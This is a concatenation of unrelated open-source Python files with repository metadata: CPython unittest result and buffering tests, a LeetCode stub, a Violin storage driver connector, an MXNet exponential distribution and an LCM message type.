class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with test_support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, StringIO)
self.assertIsInstance(sys.stderr, StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = StringIO()
result._original_stderr = StringIO()
print 'foo'
print >> sys.stderr, 'bar'
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = StringIO()
result._original_stderr = StringIO()
print >> sys.stdout, 'foo'
if include_error:
print >> sys.stderr, 'bar'
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1//0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1//0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1//0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1//0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
openqt/algorithms | leetcode/python/lc934-shortest-bridge.py | 1 | 1132 | # coding=utf-8
import unittest
"""934. Shortest Bridge
https://leetcode.com/problems/shortest-bridge/description/
In a given 2D binary array `A`, there are two islands. (An island is a
4-directionally connected group of `1`s not connected to any other 1s.)
Now, we may change `0`s to `1`s so as to connect the two islands together to
form 1 island.
Return the smallest number of `0`s that must be flipped. (It is guaranteed
that the answer is at least 1.)
**Example 1:**
**Input:** [[0,1],[1,0]]
**Output:** 1
**Example 2:**
**Input:** [[0,1,0],[0,0,0],[0,0,1]]
**Output:** 2
**Example 3:**
**Input:** [[1,1,1,1,1],[1,0,0,0,1],[1,0,1,0,1],[1,0,0,0,1],[1,1,1,1,1]]
**Output:** 1
**Note:**
1. `1 <= A.length = A[0].length <= 100`
2. `A[i][j] == 0` or `A[i][j] == 1`
Similar Questions:
"""
class Solution(object):
def shortestBridge(self, A):
"""
:type A: List[List[int]]
:rtype: int
"""
class T(unittest.TestCase):
def test(self):
pass
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
rlucio/cinder-violin-driver-icehouse | cinder/volume/drivers/violin/vxg/__init__.py | 1 | 8636 | #!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Violin Memory, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Get our library version
try:
import cinder.volume.drivers.violin.vxg.version
__version__ = cinder.volume.drivers.violin.vxg.version.__version__
except Exception:
# version.py is autogenerated during packaging. If we are running
# against original source it will not be present.
__version__ = "unknown"
import sys
import urllib2
# Require python 2.6.0
# Use hexversion for arithmatic comparison versus major-minor-micro tuple
if sys.hexversion <= 0x02060000:
raise ImportError("Requires python 2.6. Running python %d.%d.%d." %
(sys.version_info[0], sys.version_info[1],
sys.version_info[2]))
import inspect
from cinder.volume.drivers.violin.vxg.core.session import Vmos7JsonSession
from cinder.volume.drivers.violin.vxg.core.session import XGSession
from cinder.volume.drivers.violin.vxg.varray import varray
from cinder.volume.drivers.violin.vxg.vmos7 import vmos7
from cinder.volume.drivers.violin.vxg.vshare import vshare
def open(host, user='admin', password='', proto='https',
version=1, debug=False, http_fallback=True,
keepalive=False, logger=None):
"""Opens up a REST connection with the given Violin appliance.
This will first login to the given host, then access that host's version
node registration. Depending on what the host identifies itself as, an
object compatible with that particular version will be returned.
If there are any problems (such as auth failure or inaccessible hostname),
then None will be returned.
Arguments:
host -- Name or IP address of the host to connect to
user -- Username to login with
password -- Password for the user
proto -- Either 'http' or 'https'
version -- Reserved for future use
debug -- Enable/disable debugging to stdout (bool)
http_fallback -- If proto is https and https fails, fallback to http
keepalive -- Attempt to reconnect on session loss
logger -- Where to send logs (default: sys.stdout)
Returns:
An authenticated REST connection to the appliance. If there are any
connection problems, then None is returned.
"""
# Build up protocols to attempt
protocols_to_try = []
if proto.lower() == 'https':
protocols_to_try.append('https')
if proto.lower() == 'http' or http_fallback:
protocols_to_try.append('http')
# Verify the logger
log_fd = None
if logger is None:
log_fd = sys.stdout
elif (hasattr(logger, 'write') and callable(logger.write) and
hasattr(logger, 'flush') and callable(logger.flush)):
log_fd = logger
else:
raise ValueError('logger needs callable "write" and "flush" methods')
# Discover the Violin appliance supplied
for current_protocol in protocols_to_try:
try:
stream = urllib2.urlopen('{0}://{1}'.format(
current_protocol, host))
except urllib2.URLError as e:
if debug:
log_fd.write('{0}: {1}'.format(current_protocol, e))
log_fd.flush()
else:
try:
html = stream.read()
except Exception as e:
if debug:
log_fd.write('{0} (read): {1}'.format(
current_protocol, e))
log_fd.flush()
try:
stream.close()
except Exception:
pass
else:
opener = None
if 'viewport' in html:
opener = _open_json_gateway
elif 'template' in html:
opener = _open_xml_gateway
elif 'Violin Concerto Console' in html:
opener = _open_vmos7_json_gateway
stream.close()
if opener:
try:
return opener(host, user, password, current_protocol,
version, debug, keepalive, log_fd)
except IndexError as e:
log_fd.write('Failed to get authenticated session ' +
'and/or retrieve the ' +
'version ({0}): {1}'.format(
e.__class__.__name__, e))
log_fd.flush()
return None
# Nothing worked
return None
def _get_session_and_version(cls_type, host, user, password, debug,
proto, keepalive, log_fd):
"""Internal function to get a session and its version.
A tuple is returned from this fuction.
"""
session = cls_type(host, user, password, debug, proto,
True, keepalive, log_fd)
return (session, session._get_version_info())
def _open_vmos7_json_gateway(host, user, password, proto,
version, debug, keepalive, log_fd):
"""JSON REST connection for Violin vMOS7 device types.
"""
session, version_info = _get_session_and_version(Vmos7JsonSession, host,
user, password, debug,
proto, keepalive, log_fd)
return __getDeviceFor(version_info, session, vmos7, debug)
def _open_json_gateway(host, user, password, proto,
version, debug, keepalive, log_fd):
"""JSON REST connection for Symphony.
"""
raise NotImplementedError('Violin Symphony devices are unsupported')
def _open_xml_gateway(host, user, password, proto,
version, debug, keepalive, log_fd):
"""Get the traditional tallmaple REST connection.
"""
session, version_info = _get_session_and_version(XGSession, host, user,
password, debug, proto,
keepalive, log_fd)
if version_info['type'] in ('A',):
# ACM
return __getDeviceFor(version_info, session, varray, debug)
elif version_info['type'] in ('G', 'V'):
# MG
return __getDeviceFor(version_info, session, vshare, debug)
msg = 'Unknown version host_type: {0}'
raise Exception(msg.format(version_info['type']))
def __getDeviceFor(version_info, session, moduleToSearch, debug):
"""Returns a device object.
If there's a problem, an Exception is raised.
"""
version_as_tuple = __to_version_tuple(version_info['version'])
supported_versions = {}
for name, obj in inspect.getmembers(moduleToSearch):
if (inspect.isclass(obj) and name.find(
moduleToSearch.CLASS_NAMES) > -1):
if isinstance(obj._versions, basestring):
supported_versions[__to_version_tuple(obj._versions)] = obj
elif isinstance(obj._versions, list):
for x in obj._versions:
supported_versions[__to_version_tuple(x)] = obj
else:
raise Exception('Unknown version type' +
'%s ' % (obj.versions.__class__,) +
'encountered in ' +
'class %s.' % (name,))
# Find the newest object for the discovered version
for x in reversed(sorted(supported_versions.keys())):
if version_as_tuple >= x:
return supported_versions[x](session, version_info)
else:
session.close()
raise Exception('No matching connection class for {0}'.format(
version_info))
def __to_version_tuple(version):
"""Turns a dotted version string into a tuple for comparison's sake.
"""
return tuple(int(x) for x in version.split('.'))
| apache-2.0 |
leezu/mxnet | python/mxnet/gluon/probability/distributions/exponential.py | 5 | 3500 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Exponential Distribution."""
__all__ = ['Exponential']
from .exp_family import ExponentialFamily
from .constraint import Positive
from .utils import getF, sample_n_shape_converter, cached_property
class Exponential(ExponentialFamily):
r"""Create a Exponential distribution object parameterized by `scale`.
Parameters
----------
scale : Tensor or scalar
Scale of the distribution. (scale = 1 /rate)
F : mx.ndarray or mx.symbol.numpy._Symbol or None
Variable recording running mode, will be automatically
"""
# pylint: disable=abstract-method
has_grad = True
support = Positive()
arg_constraints = {'scale': Positive()}
def __init__(self, scale=1.0, F=None, validate_args=None):
_F = F if F is not None else getF(scale)
self.scale = scale
super(Exponential, self).__init__(
F=_F, event_dim=0, validate_args=validate_args)
@cached_property
def rate(self):
return 1 / self.scale
@property
def mean(self):
return self.scale
@property
def variance(self):
return self.scale ** 2
@property
def stddev(self):
return self.scale
def sample(self, size=None):
return self.F.np.random.exponential(self.scale, size=size)
def sample_n(self, size=None):
return self.F.np.random.exponential(self.scale,
size=sample_n_shape_converter(size))
def broadcast_to(self, batch_shape):
new_instance = self.__new__(type(self))
F = self.F
new_instance.scale = F.np.broadcast_to(self.scale, batch_shape)
super(Exponential, new_instance).__init__(F=F,
event_dim=self.event_dim,
validate_args=False)
new_instance._validate_args = self._validate_args
return new_instance
def log_prob(self, value):
if self._validate_args:
self._validate_samples(value)
F = self.F
return F.np.log(self.rate) - self.rate * value
def cdf(self, value):
if self._validate_args:
self._validate_samples(value)
F = self.F
return 1 - F.np.exp(-self.rate * value)
def icdf(self, value):
F = self.F
return - self.scale * F.np.log(1 - value)
def entropy(self):
F = self.F
return 1.0 + F.np.log(self.scale)
@property
def _natural_params(self):
return (-self.rate,)
def _log_normalizer(self, x):
# pylint: disable=arguments-differ
F = self.F
return -F.np.log(-x)
| apache-2.0 |
zetian/ltl_sampling | src/python_vis/sampling/path_data.py | 1 | 2256 | """LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
try:
import cStringIO.StringIO as BytesIO
except ImportError:
from io import BytesIO
import struct
class path_data(object):
__slots__ = ["num_state", "state_x", "state_y"]
__typenames__ = ["int32_t", "double", "double"]
__dimensions__ = [None, ["num_state"], ["num_state"]]
def __init__(self):
self.num_state = 0
self.state_x = []
self.state_y = []
def encode(self):
buf = BytesIO()
buf.write(path_data._get_packed_fingerprint())
self._encode_one(buf)
return buf.getvalue()
def _encode_one(self, buf):
buf.write(struct.pack(">i", self.num_state))
buf.write(struct.pack('>%dd' % self.num_state, *self.state_x[:self.num_state]))
buf.write(struct.pack('>%dd' % self.num_state, *self.state_y[:self.num_state]))
def decode(data):
if hasattr(data, 'read'):
buf = data
else:
buf = BytesIO(data)
if buf.read(8) != path_data._get_packed_fingerprint():
raise ValueError("Decode error")
return path_data._decode_one(buf)
decode = staticmethod(decode)
def _decode_one(buf):
self = path_data()
self.num_state = struct.unpack(">i", buf.read(4))[0]
self.state_x = struct.unpack('>%dd' % self.num_state, buf.read(self.num_state * 8))
self.state_y = struct.unpack('>%dd' % self.num_state, buf.read(self.num_state * 8))
return self
_decode_one = staticmethod(_decode_one)
_hash = None
def _get_hash_recursive(parents):
if path_data in parents: return 0
tmphash = (0x6655b004fa7976de) & 0xffffffffffffffff
tmphash = (((tmphash<<1)&0xffffffffffffffff) + (tmphash>>63)) & 0xffffffffffffffff
return tmphash
_get_hash_recursive = staticmethod(_get_hash_recursive)
_packed_fingerprint = None
def _get_packed_fingerprint():
if path_data._packed_fingerprint is None:
path_data._packed_fingerprint = struct.pack(">Q", path_data._get_hash_recursive([]))
return path_data._packed_fingerprint
_get_packed_fingerprint = staticmethod(_get_packed_fingerprint)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.